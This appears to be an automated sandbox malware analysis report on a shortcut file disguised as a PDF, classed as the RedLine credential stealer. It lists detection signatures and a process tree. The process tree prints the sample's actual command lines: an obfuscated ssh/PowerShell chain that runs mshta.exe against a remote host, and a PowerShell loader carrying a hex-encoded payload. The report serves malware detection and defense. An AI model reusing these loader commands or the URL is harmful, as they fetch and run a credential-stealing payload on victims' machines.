Windows
Analysis Report
Agreement for Cooperation.PDF.lnk.download.lnk
Overview
General Information
Detection
RedLine
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RedLine Stealer
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Lolbin Ssh.exe Use As Proxy
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
ssh.exe (PID: 5896 cmdline:
"C:\Window s\System32 \OpenSSH\s sh.exe" -o ProxyComm and="power shell powe rshell -Co mmand ('ms ]]]]]]h]]] ]]]]t]]]]] a.]]]]]ex] ]]]]e ]]]] ]]]h]]]]]] ]tt]]]]]p] ]]]]]]s]]] ]]]]:]]]]] ]//]]]]]]p i]]]]]c]]] ]]]]t]]]]] ]].he]]]]] a]]]]]]]l] ]]]]]t]]]] ]]hc]]]]]] l]]]]]]]i] ]]]]]]n]]] ]]]i]]]]]] c]]]]]]-st yl]]]]]]e] ]]]]ma]]]] ]]]v]]]]]] ]e]]]]]n]] ]]]]].]]]] ]]]com/]]] ]]]a]]]]]] ]pi]]]]]]/ ]]]]]u]]]] ]]]z/]]]]] ]0]]]]]]]9 12]]]]]]54 ]]]]]]]51] ]]]]64]]]] ]]/index]] ]]].mp]]]] ]4' -repla ce ']')" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC) conhost.exe (PID: 528 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 4436 cmdline:
powershell powershel l -Command ('ms]]]]] ]h]]]]]]]t ]]]]]a.]]] ]]ex]]]]]e ]]]]]]]h] ]]]]]]tt]] ]]]p]]]]]] ]s]]]]]]]: ]]]]]]//]] ]]]]pi]]]] ]c]]]]]]]t ]]]]]]].he ]]]]]a]]]] ]]]l]]]]]] t]]]]]]hc] ]]]]]l]]]] ]]]i]]]]]] ]n]]]]]]i] ]]]]]c]]]] ]]-styl]]] ]]]e]]]]]m a]]]]]]]v] ]]]]]]e]]] ]]n]]]]]]] .]]]]]]]co m/]]]]]]a] ]]]]]]pi]] ]]]]/]]]]] u]]]]]]]z/ ]]]]]]0]]] ]]]]912]]] ]]]54]]]]] ]]51]]]]]6 4]]]]]]/in dex]]]]].m p]]]]]4' - replace '] ') MD5: 04029E121A0CFA5991749937DD22A1D9) powershell.exe (PID: 5516 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " mshta.exe https://pi ct.healthc linic-styl emaven.com /api/uz/09 12545164/i ndex.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9) mshta.exe (PID: 5560 cmdline:
"C:\Window s\system32 \mshta.exe " https:// pict.healt hclinic-st ylemaven.c om/api/uz/ 0912545164 /index.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) powershell.exe (PID: 6524 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction xmCK I($tXxJW){ return -sp lit ($tXxJ W -replace '..', '0x $& ')};$LW TKB = xmCK I('A91AEEF 14D627B7FA FF488DBCCF E43EDD74C8 EC41DF4AFD AE86A2CACD 63D2618E77 6AB95B16BE 51714D0C93 388447C109 95B802510D A96A4BF1B9 A934093F8E A670FE6B48 0A54AB53BE 4B52FC1ABD D0B2F9A47D 5FD8EC0B55 65CF6E0D5A AA18330404 F1BAB02271 E1F4ADB91D A26835FBD6 F294448368 AE11C958F7 9F412C62C2 B5B5ED8BC5 91CE31107D B0B9640729 4783A633B1 81B6CCFC98 27E4078D2D 612AECF34E 25C3732DA7 01D97A8D60 5EA1A7C739 ADF164E68B D11E6ACEC7 9C72BEDBA1 60C18420A5 DB1D9810BD 0B1FE135F6 40F78FEC26 8A19278434 0B9C69305F 19E92CF4F0 EF596571F8 839C8ACF65 1D0BA0EE2D 7EC50E13BE 537E55036B C27049B63D 09CA27C810 01319E386C F456F21756 99371CAD7A 1A9F6165C7 C5452BCA97 6318223F68 E182DDFA4A 6A6E0D3A37 B3FF3D396A 65B4465C3C C0736702E8 34F0BAAAE2 0F6B4E273E 97BD27BF14 DAB30E834E C586FA7FEB 119497E06F 166F11571B D5761F27FC 24FD517F4F 7B7D12D711 4EFC8DB1E2 9AA9687AC4 BC2A6B4BDD 893E35941D AC5F77F865 82F2F16A44 8F88F4807C B645FDC442 6FF6A2A211 758433846D 104900F052 F81898303F B3E54B3F46 3B628B3140 A4BBD84F9E 5B31E891ED 77433A9B65 BD1C0FEA1C 06740E0BC2 12BC132161 654E200851 A5DA2BB192 042E792908 EA1F9C6EB7 EEE004E8E0 47C0A08E66 E6D9B8E7BC B944609F5B 020CC14792 72B40A2D30 4AC191E6C4 92064720AB E984D0F4CF 077C873C86 3D03924997 C8E4E627C7 811BF2EBD9 B06DA61C1C 0B04E7EA2F 2CABB41143 DA53E8F730 0F859AE1CF DF9875E0DF EEBD0FF722 9B35B1646F 5B57816308 AD9D62C6CA 75D45BD15C 1A2B4DA519 22CAA8E46A C5B09DF782 1207379A30 5101F22EA2 F6BB40DBA5 89322A506D 5AD46DA486 CF86F66252 2D165F3859 0072F1ACCF 13A612369B 433B00E300 CFD0606881 7A53C68187 347C9AD251 D6F1F33387 7BAD8577C4 AB84BA78F8 1483CBCB6B DB1E8FE6A5 233FDFFF6C C9928404B2 E11CFC58E3 8822138C47 F68D6A4877 8E95F28D8F 25C5F1A20D 5A198B64B2 F05536C7EA 824FF816BF 184FEA6928 44BADF041A 46DC4E6A19 7BDA3855B3 2C46F4B393 D58D5D4C7B FBCF82BEB6 990BB2069D A637871DBF B368F1C0E6 C0F2A72676 CCF3B7FA35 8C5E09F7E9 A8F481775A 2D9117CF07 D2ED2895D1 1A6B79E3CE 80BD9091E7 CC6FCFC767 86B1A9A489 50C7262C0E 9607A4C88C 23F16B1CD7 2267A44453 14586554ED 8498E02E15 56E66E5506 78D68D2A7D BDBC94565D FEE58566DC E466D06C87 ACD0517E92 543D88380A 92238E8686 4E5F75C127 98C8828272 B20A02C40B 6B317F309F 4D0C660C1D 640DEF366D 59F6E605CA 9CEA69B142 14C5D03DF3 9FC5D74B79 C43D775D11 4603D2C9BE 7F3D35D5F2 C62881528C 7674E5F58B 568C6356FC 1470BD70B4 6364F0545E FF33FFC0F3 A9487F46E6 8A23603BCF 5A004A1E55 0EB57C6E96 B9828CB497 3DBFCB8D62 AFD7390E01 D13CC77600 93F91B2F0C 22D85E18D5 40E5CBFF1D 1A2466BDD3 9B18466179 23D9C4B65A 96DF2E6FCA 65713714D2 12F0F1E8A0 05B0154FBD 7266BA5500 E44B40DDFC 0174EC740D